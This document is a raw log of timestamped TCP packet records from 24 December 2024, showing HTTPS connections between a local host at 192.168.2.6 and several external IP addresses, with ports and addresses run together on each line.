                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.668739080 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.668957949 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.668981075 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669352055 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669704914 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669780970 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669831991 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.683335066 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.711350918 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.782927990 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956413984 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956610918 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956775904 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956880093 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956901073 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.071547031 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.004477024 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.004534006 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.005098104 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.007644892 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.007663965 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.008141994 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.017997026 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.018086910 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.026822090 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.026833057 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031004906 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031011105 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031356096 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031374931 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031428099 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031434059 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031636000 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031661034 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031826019 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031835079 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031863928 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031892061 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032269001 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032279015 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032305956 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032310963 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032363892 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032371998 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032881021 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032890081 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032915115 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032924891 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032943010 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032963037 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032963991 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032974958 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032988071 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033015966 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033025026 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033082962 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033092022 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033107996 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033124924 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033129930 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033152103 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033241987 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033250093 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033284903 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033292055 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033312082 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033322096 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033720970 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.033725977 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.065884113 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.106499910 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.159590006 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.182148933 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.182172060 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.182739019 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.184047937 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.184118032 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.237698078 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.015492916 CET49982443192.168.2.618.161.69.30
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.063347101 CET4434998218.161.69.30192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.257360935 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.257395029 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.257471085 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.257667065 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.257679939 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.292401075 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.292454958 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.294532061 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.294543028 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.300287962 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.300295115 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.300363064 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.615698099 CET50055443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.615721941 CET44350055204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.615777016 CET50055443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.615988016 CET50055443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.615999937 CET44350055204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.064505100 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.064742088 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.064770937 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.065651894 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.065706015 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.067140102 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.067202091 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.067882061 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.067919016 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.067955017 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.067992926 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.113358974 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.354398012 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.354650974 CET50047443192.168.2.618.238.49.124
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.354687929 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.355038881 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.355385065 CET50047443192.168.2.618.238.49.124
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.355452061 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.355619907 CET50047443192.168.2.618.238.49.124
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.403348923 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.445983887 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.446055889 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.446173906 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.448858023 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.448877096 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.713360071 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.713407993 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.713550091 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.713835001 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.713850021 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.801692963 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.801780939 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.801846981 CET50047443192.168.2.618.238.49.124
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.802978992 CET50047443192.168.2.618.238.49.124
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.803000927 CET4435004718.238.49.124192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.823594093 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.824522018 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.824569941 CET50052443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.824613094 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.824872017 CET50053443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.824898958 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.825654030 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.825820923 CET50052443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.826638937 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.826731920 CET50053443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.826739073 CET50052443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.826816082 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.827218056 CET50053443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.828083038 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.868130922 CET50052443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.868165970 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.873229980 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.876030922 CET50050443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.876051903 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.876570940 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.877029896 CET50050443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.877029896 CET50050443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.877044916 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.877108097 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.884849072 CET50053443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.884869099 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.916203022 CET50052443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.925918102 CET50050443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.925920010 CET50053443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.959073067 CET44350051188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.959163904 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.960840940 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.960846901 CET44350051188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.961249113 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.961252928 CET44350051188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.961433887 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168122053 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168138981 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168173075 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168210030 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168237925 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215328932 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215472937 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215555906 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215578079 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215620041 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215655088 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215672016 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.263333082 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.267024994 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.307337046 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361735106 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361818075 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361865044 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361876965 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361886978 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361892939 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361913919 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361953020 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361973047 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361990929 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.362056971 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.407325983 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482024908 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482144117 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482182026 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482218027 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482254982 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482290030 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482300043 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.523367882 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.523686886 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.571326971 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603450060 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603575945 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603586912 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603634119 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603647947 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603677034 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603712082 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603730917 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603766918 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.607079983 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609208107 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609270096 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609385967 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609405994 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.610938072 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648240089 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648370028 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648394108 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648431063 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648637056 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648669004 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648694038 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.651101112 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.651130915 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.695319891 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.695512056 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726371050 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726424932 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726517916 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726661921 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726695061 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729476929 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729593992 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729597092 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729629040 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729809999 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729840040 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.733822107 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.733947992 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858707905 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858735085 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858742952 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858772993 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858795881 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858803988 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858820915 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858891010 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858951092 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.859002113 CET50062443192.168.2.6188.245.216.205
